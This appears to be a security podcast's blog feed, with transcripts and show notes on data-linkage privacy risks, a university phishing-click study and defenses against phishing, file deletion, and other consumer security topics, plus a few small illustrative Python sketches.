Tyrone Grandison: I agree with everything you just said. It's both. For certain purposes and scenarios, you know, it's good. Because you get to see new things and you get a different picture, a better picture, a more holistic picture once you integrate data sets. That being said, once you integrate data sets, you also increase the risk profile of the resulting data sets. And you lower the privacy of the people that are referenced in the data sets. Right. The more data sets you integrate...
So there's this paper that a colleague of mine, Star Ying, and I wrote, like, last year or the year before last, that basically says there's no privacy in big data. Simply because with big data you assume the three Vs: velocity, volume, and variety. As you add more and more data sets in to get, say, a larger big data set, as we call it, what happens is that the set of things that can be uniquely combined to identify a subject in that larger big data set becomes larger and larger.
So, I mean, let me see what a quick example would be. So, if you have access to toll data, you have access to the data of, you know, people that are going on your local highway or your state highway. And you have the logs of when a particular car went through a certain point. The time, the license plates, the owner. All that stuff. So, that's one data set by itself. You have a police data set that has a list of crimes that happened in particular locations. And you pick something else. You have a bunch of records from the DMV that tell you when somebody actually came in to take care of some transaction. All by themselves, very innocuous. All by themselves, if you anonymize them, or apply techniques to them to protect the privacy of the individuals, they're perfectly... okay, not perfectly, but relatively safe.
If you start combining the different data sets just randomly. You combine the toll data with the police data. And you found out that there's a particular car that was at a scene of a crime where somebody was murdered. And that car was at a toll booth that was nearby, like, one minute afterward. Now you have something interesting. You have interesting insight. So that's a good case.
We want to actually have this integration be possible. Because you get insights that you couldn't get from just having that one data set itself. If you start looking at other cases where, you know, somebody wants to actually be protected, you have, and this is just within one data set, you have a data set of all the hospital visits across four different hospitals for a particular person. What you can do if you start merging them is that you can actually use the pattern of visits to uniquely identify somebody. If you start merging that with, again, the transportation records and that may be something that gives you insight as to what somebody's sick with. That may be used...
You can identify them, first of all, which they don't want, because they went to one hospital. And that could be used to do something negative against them, like deny them insurance or whatever the use case is. But you see, in multiple different cases, one, the privacy of the individuals is actually decreased. And, two, the data can be used for, you know, positive or negative purposes. For or against the individual data subject or data owner.
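[Editor's note: a minimal Python sketch of the kind of linkage Tyrone describes above, joining two individually innocuous data sets on place and time. The toll and police records, field names, and time window are all made up for illustration; this is not IHME's data or code.

from datetime import datetime, timedelta

# Hypothetical toll records: (license plate, toll location, timestamp)
toll_log = [
    ("ABC123", "Exit 12", datetime(2017, 9, 1, 22, 4)),
    ("XYZ987", "Exit 12", datetime(2017, 9, 1, 23, 45)),
]

# Hypothetical police records: (incident, location near a toll, timestamp)
police_log = [
    ("burglary", "Exit 12", datetime(2017, 9, 1, 22, 3)),
]

WINDOW = timedelta(minutes=2)  # "about a minute afterward" in the example

# Join the two sets: which plates passed the relevant toll shortly after an incident?
matches = [
    (plate, incident)
    for incident, i_loc, i_time in police_log
    for plate, t_loc, t_time in toll_log
    if t_loc == i_loc and timedelta(0) <= t_time - i_time <= WINDOW
]
print(matches)  # [('ABC123', 'burglary')]: one vehicle singled out by the combination

End of note.]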
Cindy Ng: People have spoken about these worries. How should we intelligently synthesize this information? Because it's interesting, it's worrisome, but it can also be very beneficial. And we tend to sensationalize everything.
Tyrone Grandison: Yup. That's a good question. So, I mean, I would say to look at the major decisions in your life that you plan to be making for the next couple of years. And then look at the tools, software, things that you have online right now that a potential employer may actually look at. Or not just an employer, but any potential person that you're looking to do something with, to get a service from, who may actually look at them to evaluate whether you get the service or not. Whether it be getting a job or getting a new car. Whatever it is. Whatever that thing is that you, you know, want to actually get done.
And, you know, look at the current questions that the person on the other side will be asking and looking at. Would they be interpreted negatively for you? A quick example would just be, okay, you're a Facebook user; look at all the things that you do on there and all the, kind of, good apps that you have. And then look at who has access to all that. And in those particular instances, is that going to be a positive in that interaction or a negative in that interaction? I mean, I think that's just being responsible in the digital age, right?
Cindy Ng: Right. What is a project that you're most proud of?
Tyrone Grandison: I'm proud of a lot of things. I'm proud of the work that we do here at IHME. I think it's groundbreaking work that's gonna help a lot of people. The data that we produce has actually been used to inform pollution legislation. The numbers come out, and different ministers see them. The Ministry in China saw them and said, "Oh, we have an issue here. We need to figure out how we actually improve our longevity in terms of carbon emissions."
We've had the same thing in Africa, where there was somebody from the Ministry. I think it was, sorry, was it Gambia or Ghana? I'll find out for you afterwards. And they saw the numbers on deaths due to in-house combustion, and started a program that gave a few hundred, well, a few thousand pots to different households, and within a few years, they saw that number go down. So, literally saving lives.
I'm proud of the White House Presidential Innovation Fellows, that group of people that I worked with two and a half years ago, and the work that they did. So, one of the fellows in my group worked with the Department of the Interior to increase the number of kids going to national parks. And, you know, they did it by actually going out and talking to kids and figuring out what the correct incentive scheme would be to get kids to come to the parks during their summer breaks. And that program is called, like, Every Kid in a Park. And it's been hugely successful at getting kids and parents connected back into nature. Right. I'm also proud of the work the data service team did at the Department of Commerce. That did help a lot of people.
We routinely created data products with the user, the average American citizen, in mind. And one of the things that I'm really proud of is that we helped democratize and open up U.S. Census Bureau data. Which, you know, is very powerful. It's actually freely open to everybody, and it's been used by a lot of businesses that make a lot of money from selling the data itself. Right. So we looked at and exposed that data through something called the CitySDK, and, you know, that led to everything from people building apps to help food trucks find out where demand was, to people building websites to help accessibility-challenged people figure out how to get around particular cities, to people helping supermarkets figure out how to get fresh foods to communities that didn't have access to them. That was awesome to actually see.
The other thing was exposing the income inequality data and just like showing people that, like, the narrative that like people are hearing about the gender and the race inequality amongst different professionals is actually far worse than is actually mentioned out there in the public. So, I mean, I'm proud of all of it because it was all fun work. All impactful work. All work that hopefully helped people.
We’re a month away from Halloween, but when a police detective aptly described a hotel hacker as a ghost, I thought it was a really clever analogy! It’s hard to recreate and retrace an attacker’s steps when there are no fingerprints or evidence of forced entry.
Let’s start with your boarding pass. Before you toss it, make sure you shred it, especially the barcode. It can reveal your frequent flyer number, your name, and other PII. You can even submit the passenger’s information on the airline’s website and learn about any future flights. Anyone with access to your printed boarding pass could do harm and you would never know who your perpetrator would be.
Next, let’s assume you arrive at your destination and the hotel is using a key system with a known vulnerability. In the past, when hackers revealed a vulnerability, companies stepped up to fix it. But now, when systems need a fix and a software patch won’t do, how do we scale the fix across millions of hotel key locks?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Mike Buckbee
Do you keep holiday photos away from social media when you’re on vacation? Security pros advise that it's one way to reduce your security risk. Yes, the idea of an attacker mapping out a route to steal items from your home sounds ambitious. However, we’ve seen actual examples of both phishing attacks and theft occur.
Alternatively, the panelists point out that this perspective depends on how vulnerable you might be. An attacker who needs an entry point and believes you’re a worthy target is vastly different from the general noise of regular social media sharing.
Other articles discussed:
Panelists: Cindy Ng, Mike Thompson, Forrest Temple, Mike Buckbee
How long does it take you to tell the difference between fried chicken and a poodle? What about a blueberry muffin and a Chihuahua? When presented with these photos, it takes a closer look to tell them apart.
It turns out that self-driving car cameras have the same problem. Recently security researchers were able to confuse self-driving car cameras by adhering small stickers to a standard stop sign. What did the cameras see instead? A 45 mph speed limit sign.
The dangers are self-evident. However, the good news is that there are enough built-in sensors and cameras to act as a failsafe. But followers of our podcast know that other technologies with other known vulnerabilities might not be as lucky.
Other articles discussed:
Panelists: Cindy Ng, Jeff Peters, Kris Keyser, Mike Buckbee
Dr. Zinaida Benenson is a researcher at the University of Erlangen-Nuremberg, where she heads the "Human Factors in Security and Privacy" group. She and her colleagues conducted a fascinating study into why people click on what appears to be obvious email spam. In the second part of our interview, Benenson offers very practical advice on dealing with employee phishing and also discusses some of the consequences of IoT hacking.
[Inside Out Security] Zinaida Benenson is a senior researcher at the University of Erlangen-Nuremberg. Her research focuses on the human factors connections in privacy and security, and she also explores IoT security, two topics which we are also very interested in at the Inside Out Security blog. Zinaida recently completed research into phishing. If you were at last year's Black Hat Conference, you heard her discuss these results in a session called How To Make People Click On Dangerous Links Despite Their Security Awareness.
So, welcome Zinaida.
[Zinaida Benenson] Okay. So my group is called Human Factors In Security And Privacy. But also, as you said, we are also doing technical research on the internet of things. And mostly when we are talking about human factors, we think about how people make decisions when they are confronted with security or privacy problems, and how can we help them in making those decisions better.
[IOS] What brought you to my attention was the phishing study you presented at Black Hat, I think that was last year. And it was just so disturbing, after reading some of your conclusions and some of the results.
But before we talk about them, can you describe that specific experiment you ran phishing college students using both email and Facebook?
[ZB] In reality, this link led to an “access denied” page, but the links were individualized. So we could see who clicked, and how many times they clicked. And later, we sent them a questionnaire where we asked for the reasons for their clicking or not clicking.
[IOS] Right. So basically, they were told that they would be in an experiment but they weren't told that they would be phished.
[ZB] Yes. So recruiting people for, you know, cyber security experiments is always tricky, because you can't tell them the real goal of the experiment; otherwise, they would be extra vigilant. But on the other hand, you can't just send them something without recruiting them. So this is an ethical problem. It's usually solved by recruiting people for something similar. So in our case, it was a survey about internet habits.
[IOS] And after the experiment, you did tell them what the purpose was?
[ZB] Yes, yes. So this is called a debriefing, and this is also part of the ethical requirements. So we sent them an email where we described the experiment and also some preliminary results, and also described why it could be dangerous to click on a link in an email or a Facebook message.
[IOS] Getting back to the actual phish content, the phish messaging content, in the paper I saw, you showed the actual template you used. And it looked, I mean, as we all get lots of spam, to my eyes and I think a lot of people's eyes, like really obvious spam. Yet you achieved very respectable click rates, and I think for Facebook you got a very high rate, almost 40%, of people clicking what looked like junk mail!
[ZB] We had a bare IP address in the link, which should have alerted some people. I think it actually alerted some who didn't click. But, yes, depending on the formulation of the message, we had 20% to over 50% of email users clicking.
And independently of the formulation of the message, we had around 40% of Facebook users clicking. So in all cases, it's enough, for example, to get a company infected with malware!
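[Editor's note: the "bare IP address in the link" detail is a signal that can be checked mechanically. Below is a minimal Python sketch, with made-up URLs, that flags links whose host is a raw IP address, one common though far-from-sufficient phishing heuristic.

import ipaddress
from urllib.parse import urlparse

def has_bare_ip_host(url: str) -> bool:
    """Return True if the URL's host is a raw IP address rather than a domain name."""
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

# Made-up examples: the first mimics the study's bare-IP style, the second a normal domain.
for link in ["http://203.0.113.7/party-photos", "https://example.edu/photos"]:
    print(link, "->", "suspicious: bare IP host" if has_bare_ip_host(link) else "looks ordinary")

End of note.]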
[ZB] So the reasons. The most important or most frequently stated reason for clicking was curiosity. People were amused that the message was not addressed to them, but they were interested in the pictures.
And the next most frequently stated reason was that the message actually was plausible because people actually went to a party last week, and there were people there that they did not know. And so they decided that it's quite plausible to receive such a message.
[IOS] However, it was kind of a very generic looking message. So it's a little hard to believe, to me, that they thought it somehow related to them!
[ZB] We should always consider the target audience. And this was students, and students communicate informally. Quite often, people have friends and don't even know their last names. And of course, if I were sending such a phishing email to, say, employees of a company, or to the general population, I wouldn't formulate it like this. So our targeting actually worked quite well.
[IOS] So it was almost intentional that it looked...it was intentional that it looked informal and something that a college student might send to another one. "Hey, I saw you at a party." Now, I forget, was the name of the person receiving the email mentioned in the content or not? It just said, "Hey"?
[ZB] We had actually two waves of the experiment. In the first wave, we mentioned people's names and we got over 50% of email recipients' click. And this was very surprising for us because we actually expected that on Facebook, people would click more just because people share pictures on Facebook, and it's easier to find a person on Facebook, or they know, okay, there is a student, it is a student and say, her first name is Sabrina or whatever.
And so we were absolutely surprised to learn that over 50% of email recipients clicked in the first wave of the experiment! And we thought, "Okay, why could this be?" And we decided that maybe it was because we addressed people by their first names. So it was like, "Hey, Anna."
And so we decided to have the second wave of the experiment where we did not address people by their first names, but just said, "Hey." And so we got the same, or almost the same, clicking rate on Facebook. But a much lower clicking rate on email.
[IOS] And I think you had an explanation for that, if you had a theory about why that may be, why the rates were similar [for Facebook]?
[ZB] Yeah. So on Facebook, it seems that it doesn't matter if people are addressed by name. Because as I said, the names of people on Facebook are very salient. So when you are looking up somebody, you can see their names.
But if somebody knows my email address and knows my name, it might seem to some people …. more plausible. But this is just ... we actually didn't have any people explaining this in the messages. Also, we got a couple of people saying on email that, "Yeah, well, we didn't click that. Oh, well it didn't address me by name, so it looked like spam to me."
So actually … names in emails seem to be important, even if at our university, email addresses consist of first name, point, second name, at university domain.
[IOS] I thought you also suggested that because Facebook is a community, that there's sort of a higher level of trust in Facebook than in just getting an email. Or am I misreading that?
[ZB] Well, it might be. It might be like this. But we did not check for this. And actually, there are different research. So some other people did some research on how well people trust Facebook and Facebook members. And yeah, people defer quite a lot, and I think that people use Facebook, not because they particularly trust it, but because it's very convenient and very helpful for them.
[ZB] Well, first of all, we were surprised how honestly people answered. And saying, "Oh, I was curious about pictures of unknown people and an unknown party." It's a negative personality trait, yeah? So it was very good that we had an anonymous questionnaire. Maybe it made people, you know, answering more honestly. And I think that curiosity is, in this case, it was kind of negative, a negative personality trait.
But actually, if you think about it, it's a very positive personality trait. Because curiosity and interest motivate us to, for example, to study and to get a good job, and to be good in our job. And they are also directly connected to creativity and interaction.
[IOS] But on the other hand, curiosity can have some bad results. I think you also mentioned that even for those who were security aware, it didn't really make a difference.
[ZB] Well, we asked people if they know — in the questionnaire —we asked them before we revealed the experiment, and asked them whether they clicked or not. We asked them a couple of questions that are related to security awareness like, "Can one be infected by a virus if one clicks on an attachment in an email, or on a link?"
And when we tried to correlate, statistically correlate, the answers to this question, to this link clicking question, with people's report on whether they clicked or not, we didn't find any correlation.
So this result is preliminary, yeah. We can't say with certainty, but it seems like awareness doesn't help a lot. And again, I have a hypothesis about this, but no proof so far.
[IOS] And what is that? What is your theory?[ZB] My theory is that people can't be vigilant all the time. And psychological research actually showed that interaction, creativity, and good mood are connected to increased gullibility.
And on the other hand, the same line of research showed that vigilance, and suspicion, and an analytical approach to solving problems is connected to bad mood and increased effort. So if we apply this, it means that being constantly vigilant is connected to being in a bad mood, which we don't want!
And which is also not good for atmosphere, for example, in a firm. And with increased effort, which means that we are just tiring. And when we...at some time, we have to relax. And if the message arrives at this time, it's quite plausible for everybody, and I mean really for everybody including me, you, and every security expert in the world, to click on something!
[IOS] It also has some sort of implications for hackers, I suppose. If they know that a company just went IPO … or everyone got raises in the group, then you start phishing them and sort of leverage off their good moods!
[ZB] Well, I would suggest firstly to, you know, to make sure that they understand the users and the humans on the whole, yeah? We security people tend to consider users as you know, as nuisance, like, ‘Okay they're always doing the wrong things.’
Actually, we as security experts should protect people! And if the employees in the company were not there, then we wouldn't have our job, yeah?
So what is important is to let humans be humans … And with all their positive but also negative characteristics and something like curiosity, for example, can be both.
And to turn to technical defense I would say. Because to infect a company, one click is enough, yeah? And one should just assume that it will happen because of all these things I was saying even if people are security aware.
The question is, what happens after the click?
And there are not many examples of, you know, companies telling how they mitigate such things. So the only one I was able to find was the [inaudiable] security incident in 2011. I don't know if you remember. They were hacked and had to change, actually to exchange all the security tokens.
And they, at least they published at least a part of what happened. And yeah, that was a very tiny phishing wave that maybe reached around 10 employees and only one of them clicked. So they got infected, but they noticed, they say that they noticed it quite quickly because of other security measures.
I would say that that's what one should actually expect and that's what is the best outcome one can hope for. Yes, if one notices in time.
[IOS] I agree that IT should be aware that this will happen and that the hackers and some will get in and you should have some secondary defenses. But I was also wondering, does it also suggest that perhaps some people should not have access to email?
I mean … does this lead to a test … .and if some employees are just, you know, a little too curious, you just think, "You know what, maybe we take the email away from you for a while?"
[ZB] Well you know, you can. I mean a company can try this if they can sustain the business consequences of this, yeah? So if people don't have emails then maybe some business processes will become less efficient and also employees might become disgruntled which is also not good.
I would suggest that ... I think that it's not going to work! And at least it's not a good trade off. It might work but it's not a good trade off because, you know, all this for...If you implement a security measure that, that impairs business processes, it makes people dissatisfied!
Then you have to count in the consequences.
[IOS] I agree that IT should be aware that this will happen and that the hackers will get in and you should have some secondary defenses.
But I was also wondering, does it also suggest that perhaps some people should not have access to email? I mean ... does this lead to a test where if some employees are just, you know, a little too curious you just say, ‘You know what? Maybe we take the e-mail away from you for a while.’
[ZB] Well, you know, you can. I mean, a company can try this if they can, you know, if they can sustain the business costs and consequences of this, yeah?
So if people don't have emails then maybe some business processes will become less efficient and yeah, and also employees might become disgruntled which is also not good.
I would suggest that, I think that it's not going to work!
And at least it's not a good trade off. It might work, but it's not a good trade off because, you know, all this for...if you implement security measure that impairs our business processes and makes people dissatisfied, then you have to count in the consequences.
[IOS] I'm agreeing with you that the best defense I think is awareness really and then taking other steps. I wanted to ask you one or two more questions.
One of them is about what they call whale phishing or spear phishing perhaps is another way to say it, which is just going after not just any employee, but usually high-level executives.
And at least from some anecdotes I've heard, executives are also prone to clicking on spam just like anybody else, but your research also suggests that some of the more context you provide, the more likely you'll get these executives to click.
[ZB] Okay, so if you get more context of course you can make the email more plausible, and of course if you are targeting a particular person, there is a lot of possibilities to get information about them, and especially if it's somebody well-known like an executive of a company.
And I think that there are also some personality traits of executives that might make them more likely to click. Because, you know, they didn't get their positions by being especially cautious and not taking risk and saying all safety first!
I think that executives maybe even more risk-taking than, you know, average employee and more sure of themselves, and this might get a problem even more difficult. So it also may be even to not like being told by anybody about any kind of their behavior.
[ZB] Well, of course IoT data is everything's that is collected in our environment about us can be used to infer our preferences with quite a good precision.
So… for example we had an experiment where we were able just from room climate data, so from temperature enter the age of humidity to determine if a person is, you know, staying or sitting. And this kind of data of course can be used to target messages even more precisely
So for example if you can infer a person's mood and if you suppose if you buy from the psychological research that people in good moods are more likely to click, you might try to target people in better mood, yeah? Through the IOT data available to you or through IOT data available to you through the company that you hacked.
Yeah … point is, you know, that targeting already works very well. Yeah, you just need to know the name of the person and maybe the company this person is dealing with!
[IOS] Zinaida this was a very fascinating conversation and really has a lot of implications for how IT security goes about their job. So I'd like to thank you for joining us on this podcast!
[ZB] You're welcome. Thank you for inviting me!
When we delete a file, our computer’s user interface makes the file disappear as if it were just a simple drag and drop. The reality is that the file is still on your hard drive.
In this episode of the Inside Out Security Show, our panelists elaborate on the complexities of deleting a file, the lengths IT pros go through to obliterate a file, and surprising places your files might reside.
Kris Keyser explains, “When you’re deleting a file, you’re not necessarily deleting a file. You’re deleting the reference to that file.”
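To make Keyser's point concrete, here is a minimal sketch in Python, specific to POSIX-style filesystems and using a made-up file name, of what "deleting the reference" means: removing a file drops its directory entry, but an already-open handle can still read the data until the last reference goes away.

```python
# Minimal sketch: "deleting" a file removes the name (the reference),
# not necessarily the data. POSIX-specific; on Windows, os.remove would
# fail while the handle is still open.
import os

path = "example.txt"  # hypothetical file name, for illustration only

with open(path, "w") as f:
    f.write("sensitive contents")

handle = open(path, "r")      # keep a reference to the file open
os.remove(path)               # "delete": the directory entry is gone...

print(os.path.exists(path))   # False: no name points to the file anymore
print(handle.read())          # ...but the data blocks are still readable
handle.close()                # only now can the filesystem reclaim them
```

Truly obliterating a file, as the panel discusses, means dealing with those underlying blocks and any copies in backups, snapshots, or caches, not just removing the name.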
Panelists: Cindy Ng, Kris Keyser, Jeff Peters, Forrest Temple
Zinaida Benenson is a researcher at the University of Erlangen-Nuremberg, where she heads the "Human Factors in Security and Privacy" group. She and her colleagues conducted a fascinating study into why people click on what appears to be obvious email spam. In the first part of our interview with Benenson, we discuss how she collected her results, and why curiosity seems to override security concerns when dealing with phish mail.
[Inside Out Security] Zinaida Benenson is a senior researcher at the University of Erlangen-Nuremberg. Her research focuses on the human factors connections in privacy and security, and she also explores IoT security, two topics which we are also very interested in at the Inside Out Security blog. Zinaida recently completed research into phishing. If you were at last year's Black Hat Conference, you heard her discuss these results in a session called How To Make People Click On Dangerous Links Despite Their Security Awareness.
So, welcome Zinaida.
[Zinaida Benenson] Okay. So my group is called Human Factors In Security And Privacy. But also, as you said, we are also doing technical research on the internet of things. And mostly when we are talking about human factors, we think about how people make decisions when they are confronted with security or privacy problems, and how can we help them in making those decisions better.
[IOS] What brought you to my attention was the phishing study you presented at Black Hat, I think that was last year. And it was just so disturbing, after reading some of your conclusions and some of the results.
But before we talk about them, can you describe the specific experiment you ran, phishing college students using both email and Facebook?
[ZB] In reality, this link led to an “access denied” page, but the links were individual. So we could see who clicked, and how many times they clicked. And later, we sent them a questionnaire where we asked for the reasons for their clicking or not clicking.
[IOS] Right. So basically, they were told that they would be in an experiment but they weren't told that they would be phished.
[ZB] Yes. So recruiting people for, you know, cyber security experiments is always tricky because you can't tell them the real goal of the experiment — otherwise, they would be extra vigilant. But on the other hand, you can't just send them something without recruiting them. So this is an ethical problem. It's usually solved by recruiting people for something similar. So in our case, it was a survey about internet habits.
[IOS] And after the experiment, you did tell them what the purpose was?
[ZB] Yes, yes. So this is called a debriefing, and this is also a special part of the ethical requirements. So we sent them an email where we described the experiment and also some preliminary results, and also described why it could be dangerous to click on a link in an email or a Facebook message.
[IOS] Getting back to the actual phish content, the phish messaging content, in the paper I saw, you showed the actual template you used. And it looked — I mean, as we all get lots of spam – to my eyes and I think a lot of people's eyes, it just looked like really obvious spam. Yet, you achieved like very respectable click rates, and I think for Facebook, you got a very high rate – almost, was it 40% – of people clicking what looked like junk mail!
[ZB] We had a bare IP address in the link, which should have alerted some people. I think it actually alerted some who didn't click. But, yes, depending on the formulation of the message, we had 20% to over 50% of email users clicking.
And independently of the formulation of the message, we had around 40% of Facebook users clicking. So in all cases, it's enough, for example, to get a company infected with malware!
[ZB] So the reasons. The most important or most frequently stated reason for clicking was curiosity. People were amused that the message was not addressed to them, but they were interested in the pictures.
And the next most frequently stated reason was that the message actually was plausible because people actually went to a party last week, and there were people there that they did not know. And so they decided that it's quite plausible to receive such a message.
[IOS] However, it was kind of a very generic looking message. So it's a little hard to believe, to me, that they thought it somehow related to them!
[ZB] We should always consider the target audience. And this was students, and students communicate informally. Quite often, people have friends and don't even know their last names. And of course, I wouldn't send … if I was sending such a phishing email to, say, employees of a company, or to the general population, I wouldn't formulate it like this. So our targeting actually worked quite well.
[IOS] So it was almost intentional that it looked...it was intentional that it looked informal and something that a college student might send to another one. "Hey, I saw you at a party." Now, I forget, was the name of the person receiving the email mentioned in the content or not? It just said, "Hey"?
[ZB] We had actually two waves of the experiment. In the first wave, we mentioned people's names and we got over 50% of email recipients to click. And this was very surprising for us because we actually expected that on Facebook, people would click more, just because people share pictures on Facebook, and it's easier to find a person on Facebook, or they know, okay, this is a student, and say, her first name is Sabrina or whatever.
And so we were absolutely surprised to learn that over 50% of email recipients clicked in the first wave of the experiment! And we thought, "Okay, why could this be?" And we decided that maybe it was because we addressed people by their first names. So it was like, "Hey, Anna."
And so we decided to have the second wave of the experiment where we did not address people by their first names, but just said, "Hey." And so we got the same, or almost the same, clicking rate on Facebook. But a much lower clicking rate on email.
[IOS] And I think you had an explanation for that, or a theory about why that may be, why the rates were similar [for Facebook]?
[ZB] Yeah. So on Facebook, it seems that it doesn't matter if people are addressed by name. Because as I said, the names of people on Facebook are very salient. So when you are looking up somebody, you can see their names.
But if somebody knows my email address and knows my name, it might seem to some people … more plausible. But this is just ... we actually didn't have any people explaining this in the messages. Also, we got a couple of people saying about email that, "Yeah, well, we didn't click that. Well, it didn't address me by name, so it looked like spam to me."
So actually … names in emails seem to be important, even though at our university, email addresses consist of first name, dot, last name, at the university domain.
[IOS] I thought you also suggested that because Facebook is a community, that there's sort of a higher level of trust in Facebook than in just getting an email. Or am I misreading that?
[ZB] Well, it might be. It might be like this. But we did not check for this. And actually, there is different research. So some other people did some research on how much people trust Facebook and Facebook members. And yeah, people differ quite a lot, and I think that people use Facebook not because they particularly trust it, but because it's very convenient and very helpful for them.
[ZB] Well, first of all, we were surprised how honestly people answered. Saying, "Oh, I was curious about pictures of unknown people and an unknown party" admits to a negative personality trait, yeah? So it was very good that we had an anonymous questionnaire. Maybe it made people, you know, answer more honestly. And I think that curiosity, in this case, was kind of negative, a negative personality trait.
But actually, if you think about it, it's a very positive personality trait. Because curiosity and interest motivate us to, for example, to study and to get a good job, and to be good in our job. And they are also directly connected to creativity and interaction.
[IOS] But on the other hand, curiosity can have some bad results. I think you also mentioned that even for those who were security aware, it didn't really make a difference.
[ZB] Well, in the questionnaire, before we revealed the experiment and asked them whether they clicked or not, we asked them a couple of questions related to security awareness, like, "Can one be infected with a virus if one clicks on an attachment in an email, or on a link?"
And when we tried to statistically correlate the answers to these questions with people's reports of whether they clicked or not, we didn't find any correlation.
So this result is preliminary, yeah. We can't say with certainty, but it seems like awareness doesn't help a lot. And again, I have a hypothesis about this, but no proof so far.
[IOS] And what is that? What is your theory?
[ZB] My theory is that people can't be vigilant all the time. And psychological research actually showed that interaction, creativity, and good mood are connected to increased gullibility.
And on the other hand, the same line of research showed that vigilance, and suspicion, and an analytical approach to solving problems is connected to bad mood and increased effort. So if we apply this, it means that being constantly vigilant is connected to being in a bad mood, which we don't want!
And which is also not good for the atmosphere, for example, in a firm. And with increased effort, which means that we just get tired. And at some point, we have to relax. And if the message arrives at this time, it's quite plausible for everybody, and I mean really for everybody, including me, you, and every security expert in the world, to click on something!
[IOS] It also has some sort of implications for hackers, I suppose. If they know that a company just went IPO … or everyone got raises in the group, then you start phishing them and sort of leverage off their good moods!
[ZB] Well, I would suggest firstly to, you know, to make sure that they understand the users and humans on the whole, yeah? We security people tend to consider users as, you know, a nuisance, like, ‘Okay, they're always doing the wrong things.’
Actually, we as security experts should protect people! And if the employees in the company were not there, then we wouldn't have our job, yeah?
So what is important is to let humans be humans … And with all their positive but also negative characteristics and something like curiosity, for example, can be both.
And I would say, turn to technical defenses. Because to infect a company, one click is enough, yeah? And one should just assume that it will happen, because of all these things I was saying, even if people are security aware.
The question is, what happens after the click?
And there are not many examples of, you know, companies telling how they mitigate such things. The only one I was able to find was the [inaudible] security incident in 2011. I don't know if you remember. They were hacked and had to change, actually to exchange, all the security tokens.
And they published at least a part of what happened. And yeah, that was a very tiny phishing wave that maybe reached around 10 employees, and only one of them clicked. So they got infected, but they say that they noticed it quite quickly because of other security measures.
I would say that that's what one should actually expect, and that's the best outcome one can hope for: that one notices in time.
[IOS] I agree that IT should be aware that this will happen, that some hackers will get in, and that you should have some secondary defenses. But I was also wondering, does it also suggest that perhaps some people should not have access to email?
I mean … does this lead to a test … and if some employees are just, you know, a little too curious, you just think, "You know what, maybe we take the email away from you for a while?"
[ZB] Well, you know, you can. I mean, a company can try this if they can sustain the business consequences of this, yeah? So if people don't have email, then maybe some business processes will become less efficient, and also employees might become disgruntled, which is also not good.
I would suggest that ... I think that it's not going to work! And at least it's not a good trade-off. It might work, but it's not a good trade-off, because, you know, if you implement a security measure that impairs business processes, it makes people dissatisfied!
Then you have to count in the consequences.
[IOS] I'm agreeing with you that the best defense, I think, is really awareness and then taking other steps. I wanted to ask you one or two more questions.
One of them is about what they call whale phishing, or spear phishing is perhaps another way to say it, which is going after not just any employee, but usually high-level executives.
And at least from some anecdotes I've heard, executives are also prone to clicking on spam just like anybody else, but your research also suggests that the more context you provide, the more likely you'll get these executives to click.
[ZB] Okay, so if you get more context of course you can make the email more plausible, and of course if you are targeting a particular person, there is a lot of possibilities to get information about them, and especially if it's somebody well-known like an executive of a company.
And I think that there are also some personality traits of executives that might make them more likely to click. Because, you know, they didn't get their positions by being especially cautious, not taking risks, and saying safety first!
I think that executives may be even more risk-taking than, you know, the average employee, and more sure of themselves, and this might make the problem even more difficult. They also may not like being told by anybody about any aspect of their behavior.
[ZB] Well, of course IoT data, everything that is collected in our environment about us, can be used to infer our preferences with quite good precision.
So, for example, we had an experiment where we were able, just from room climate data, so from temperature and humidity, to determine whether a person is, you know, standing or sitting. And this kind of data, of course, can be used to target messages even more precisely.
So, for example, if you can infer a person's mood, and if you buy from the psychological research that people in good moods are more likely to click, you might try to target people in a better mood, yeah? Through the IoT data available to you, or through IoT data available to you from the company that you hacked.
Yeah … the point is, you know, that targeting already works very well. You just need to know the name of the person and maybe the company this person is dealing with!
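As a toy illustration of the room-climate inference Benenson mentions above, here is a minimal sketch with entirely made-up readings (this is not her group's method or data): fit a nearest-centroid classifier on a few labeled temperature and humidity samples, then label a new reading as "standing" or "sitting".

```python
# Toy sketch: infer an occupant's state from room-climate readings.
# All numbers are synthetic examples, not real study data.
import math

labeled = {
    "sitting":  [(22.1, 41.0), (22.3, 42.5), (22.0, 40.2)],   # (temp C, humidity %)
    "standing": [(23.0, 45.5), (23.4, 46.8), (23.1, 44.9)],
}

def centroid(points):
    n = len(points)
    return (sum(p[0] for p in points) / n, sum(p[1] for p in points) / n)

centroids = {label: centroid(pts) for label, pts in labeled.items()}

def classify(reading):
    # assign the label whose centroid is closest to the new reading
    return min(centroids, key=lambda label: math.dist(reading, centroids[label]))

print(classify((23.2, 46.0)))  # -> "standing" with these made-up numbers
```

Even a crude model like this shows how routinely collected sensor data can leak behavioral signals that an attacker could use to time a phish.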
[IOS] Zinaida, this was a very fascinating conversation and really has a lot of implications for how IT security goes about their job. So I'd like to thank you for joining us on this podcast!
[ZB] You're welcome. Thank you for inviting me!
While some management teams are afraid of a pentest or risk assessment, other organizations - particularly financial institutions - are well aware of their security risks. They are addressing these risks by simulating fake cyberattacks. By putting IT, managers, board members, and executives who would be responsible for responding to a real breach or attack through these simulations, they learn how to respond to the press, regulators, and law enforcement, as well as other scenarios they might not otherwise expect.
However, other security experts would argue that cyber war rooms are financially prohibitive for most organizations with a limited budget. What’s more, organizations should keep in mind that not all attacks have to be complicated. If organizations curb phishing attacks or achieve a least privilege model, they would already significantly reduce their risk.
Panelists: Cindy Ng, Mike Buckbee, Kris Keyser, Kilian Englert
Some of you might be familiar with Roxy Dee’s infosec book giveaways. Others might have met her recently at Defcon as she shared with infosec n00bs practical career advice. But aside from all the free books and advice, she also has an inspiring personal and professional story to share.
In our interview, I learned that she had a budding interest in security but lacked the funds to pursue her passion. How did she work around her financial constraint? Free videos and notes from Professor Messer! What’s more, she thrived in her first post providing tech support for Verizon Fios. With grit, discipline, and volunteering at BSides, she eventually landed an entry-level position as a network security analyst.
Now she works as a threat intelligence engineer and in her spare time, she writes how-tos and shares sage advice on her Medium account, @theroxyd
